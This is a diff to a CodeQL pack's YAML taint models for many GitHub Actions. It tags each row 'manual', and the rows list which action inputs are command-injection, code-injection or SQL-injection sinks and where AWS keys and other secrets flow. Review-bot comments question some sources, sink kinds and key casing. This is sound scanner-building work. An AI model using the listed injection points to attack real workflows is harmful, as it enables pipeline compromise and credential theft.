extensible: sinkModel data: - - ["asdf-vm/actions", "*", "input.before_install", "command-injection"] \ No newline at end of file + - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 5ab9fee1667..2a26d31feac 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index a6e1364d218..82e81f55816 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] - - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] + - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index cfdbb0b825f..58554eb3f61 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] - - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint"] - - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint"] + - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index 26b3a1fd3df..ca99210b4c2 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml 
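Review bot: The `uppercase` and `lowercase` rows take `input.replace-with` as their source while the `capitalized` row takes `input.string`; `replace-with` looks copied from a string-replace model, and marking the rows `manual` now presents them as reviewed. If the action exposes only a `string` input (check its `action.yml`), taint reaching the upper- and lower-case outputs is missed. The rows would then read `["aszc/change-string-case-action", "*", "input.string", "output.uppercase", "taint", "manual"]` and the same for `output.lowercase`.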
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 236eade34a6..1563d95b0b1 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"] - - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"] + - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] + - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index c0e11c8201f..2bb6000355d 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/powershell", "*", "input.azPSVersion", "command-injection"] + - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index 2841f406bda..b0c3419abe9 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"] + - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index aa060de610d..cbe593690e4 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] - - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] - - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index 2d8932d87fb..f29355d4882 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 7d5f699a0e9..8463ed9577b 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] - - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index aeda7998631..f20a877c3d2 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index 38b18cf6cac..e0fe96ff915 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] - - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 2e4291eb480..a7489b68688 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] - - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index 3be7669275c..c0a18c36465 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml 
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["changesets/action", "*", "input.publish", "command-injection"]
- - ["changesets/action", "*", "input.version", "command-injection"]
+ - ["changesets/action", "*", "input.publish", "command-injection", "manual"]
+ - ["changesets/action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml
index cb0870b4883..79ed7a80437 100644
--- a/ql/lib/ext/cloudflare_wrangler-action.model.yml
+++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"]
- - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"]
+ - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"]
+ - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"]
diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml
index bfb45dddb66..550b5b854ed 100644
--- a/ql/lib/ext/coursier_cache-action.model.yml
+++ b/ql/lib/ext/coursier_cache-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"]
+ - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"]
diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
index 30e59e91d60..bbe88611259 100644
--- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"]
+ - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
index f3b021d226b..83b3bc3520d 100644
--- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"]
\ No newline at end of file
+ - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml
index 60e35e66a4d..3b0642fece4 100644
--- a/ql/lib/ext/csexton_release-asset-action.model.yml
+++ b/ql/lib/ext/csexton_release-asset-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"]
+ - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
index 25df02dacaa..db55d3c6f3a 100644
--- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
+++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"]
- - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"]
- - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"]
+ - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"]
+ - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"]
+ - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection", "manual"]
diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml
index 0aaa1b0722a..21688675a2e 100644
--- a/ql/lib/ext/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/cypress-io_github-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch"]
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch", "manual"]
diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml
index 324171f3c4b..46226863687 100644
--- a/ql/lib/ext/dailydotdev_action-devcard.model.yml
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"]
- - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"]
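Review bot: The two `dailydotdev/action-devcard` rows keep the sink kind `sql-injection` for `input.commit_branch` and `input.commit_filename`, which stands out because every other sink in this change is `command-injection` or `code-injection`. A branch name and a file name would more plausibly reach a git or shell invocation than a database query, but the action's code is not visible here, so this needs checking against the action source. If they do reach a shell, the rows should read `- ["dailydotdev/action-devcard", "*", "input.commit_branch", "command-injection", "manual"]`, and likewise for `input.commit_filename`. If no query consumes `sql-injection` sinks, tainted data flowing into these inputs would go unreported.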
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
index cc5c311eea7..afe3e82ca1f 100644
--- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
+++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"]
+ - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"]
diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml
index f45aae02158..5b0a9dab38d 100644
--- a/ql/lib/ext/daspn_private-actions-checkout.model.yml
+++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"]
- - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"]
+ - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"]
+ - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
index 7445d673fcf..35bbd72f0a4 100644
--- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
+++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"]
- - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"]
+ - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"]
+ - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
index 3bc1dcc4759..f90eaeb7271 100644
--- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details"]
+ - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details", "manual"]
diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml
index 82f491390d2..1647e560730 100644
--- a/ql/lib/ext/delaguardo_setup-clojure.model.yml
+++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"]
\ No newline at end of file
+ - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
index 430a96f6cbe..bbdad8287dd 100644
--- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
+++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"]
\ No newline at end of file
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
index 37bcf2cc781..f3ac66006d9 100644
--- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
+++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
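Review bot: The key `determinatesystems/magic-nix-cache-action` in these six sink rows is all lower case, while workflows normally reference the action as `DeterminateSystems/magic-nix-cache-action`, so the rows only apply if the library lower-cases the `uses:` value before matching, which this hunk does not show. The same applies to the `endbug/latest-tag`, `firebaseextended/action-hosting-deploy`, `gabrielbb/xvfb-action`, `jamesives/github-pages-deploy-action` and `johnnymorganz/stylua-action` hunks. Once confirmed, I would record the convention in each file with a comment above `data:`, for example `# action names are compared lower-cased; keep keys in lower case`. A silent mismatch here would show up only as missing command-injection results, so a test workflow using the mixed-case name is worth adding.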
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"]
- - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"]
- - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection", "manual"]
diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml
index 77eaf3ae10f..9189245e228 100644
--- a/ql/lib/ext/docker_build-push-action.model.yml
+++ b/ql/lib/ext/docker_build-push-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["docker/build-push-action", "*", "input.context", "code-injection"]
\ No newline at end of file
+ - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
index 41a9c337f49..14743f2819e 100644
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ b/ql/lib/ext/dorny_paths-filter.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dorny/paths-filter", "*", "output.changes", "PR changed files"]
+ - ["dorny/paths-filter", "*", "output.changes", "PR changed files", "manual"]
diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml
index 63cdb2a496b..bd64fc37423 100644
--- a/ql/lib/ext/endbug_latest-tag.model.yml
+++ b/ql/lib/ext/endbug_latest-tag.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["endbug/latest-tag", "*", "input.ref", "command-injection"]
- - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"]
- - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"]
- - ["endbug/latest-tag", "*", "input.description", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.git-directory", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.description", "command-injection", "manual"]
diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml
index d0bcbb4da98..9a20279e110 100644
--- a/ql/lib/ext/expo_expo-github-action.model.yml
+++ b/ql/lib/ext/expo_expo-github-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["expo/expo-github-action", "*", "input.command", "command-injection"]
- - ["expo/expo-github-action", "*", "input.packager", "command-injection"]
+ - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"]
+ - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"]
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
index 6418e71f22a..8d06bc8a512 100644
--- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
+++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"]
+ - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml
index 760b7cd46e7..9d066ac23ec 100644
--- a/ql/lib/ext/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/frabert_replace-string-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"]
- - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"]
+ - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"]
+ - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"]
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index b6c75a06e57..ecfce617df4 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body"]
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body", "manual"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title", "manual"]
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
index 86705319e23..563da9d4c0f 100644
--- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"]
- - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"]
\ No newline at end of file
+ - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"]
+ - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml
index 61fdcd9254a..5194ce500fb 100644
--- a/ql/lib/ext/game-ci_unity-builder.model.yml
+++ b/ql/lib/ext/game-ci_unity-builder.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"]
- - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"]
+ - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"]
+ - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"]
diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml
index 2d142d98099..8c2f32627d9 100644
--- a/ql/lib/ext/game-ci_unity-test-runner.model.yml
